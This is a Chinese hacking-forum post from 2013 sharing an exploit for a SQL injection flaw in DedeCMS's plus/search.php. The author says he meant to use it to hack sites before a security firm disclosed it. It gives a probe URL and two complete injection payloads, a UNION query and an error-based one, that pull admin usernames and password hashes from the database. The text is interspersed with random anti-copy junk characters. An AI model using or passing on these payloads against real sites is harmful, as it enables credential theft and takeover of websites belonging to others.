找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2267|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ
4 y! s$ m" u+ M& m* T. k+ c" @, B( v
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
8 p: Q! ^. R( e, {3 y0 p8 m- |* I7 e5 x  z3 s+ M" C' S
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。( g, f$ O/ S8 M5 o; @8 Q
! ?! V. d* Z5 B' E
我一般是这样测试的:; h. ?% |1 T9 O( N' d4 i

2 v  I; w3 R% T2 F: I提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a, O9 }7 t; q0 d# _% Q

- q7 U4 e4 \) X( {转载不加作者名的没JJ
" T. @% v( F1 e- {0 n* i' q
; u) A' c- {& K4 P) P! P作者:鬼哥
5 L7 T) b7 i4 o+ Z+ P1 A# i' q2 l% S  s# P- a
& S2 ~+ x! l- @; w5 z' u/ o0 ^4 x

( B3 a4 z# R/ N& R  G看结果如果提示
, k! M1 l6 _! h( I% Y2 D; ^0 o# ?3 q% ?. J
Safe Alert: Request Error step 2 !0 _/ l* V, v* ~2 m3 r
' n" F7 `7 b& y$ O
那么直接用下面的exp; s5 w4 V) k+ ]! v6 c
9 X1 x  |/ H& v, W8 T. ~
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a* r4 T3 s2 ^' C# {
0 o) r9 }: b9 C0 q; |, n# D" ~' _6 @
& w! R/ ^0 {$ E) P4 V  Y+ |. u
看结果如果提示7 a' Y, Q/ F8 o) |0 d- [% X

/ n" E* d$ y( z. \* R! H/ iSafe Alert: Request Error step 1 !' Q! {# ~6 j+ A- F) F

/ @9 \  \$ e& W$ D2 D/ d那么直接用下面的exp0 ?1 t; F  |: \/ c" Z

( w! a2 @" w7 f' S  \/ ~- |- kxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
3 M+ A7 e1 ]- r+ S& C
  |' T; i! H" @3 M. B# a- u
7 O8 L- o5 p& Q0 [% q如果正常显示证明漏洞不存在了。
; G0 x" q: r& ~$ x! b  x9 s0 D* ^, g5 F; m: {! Y
转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表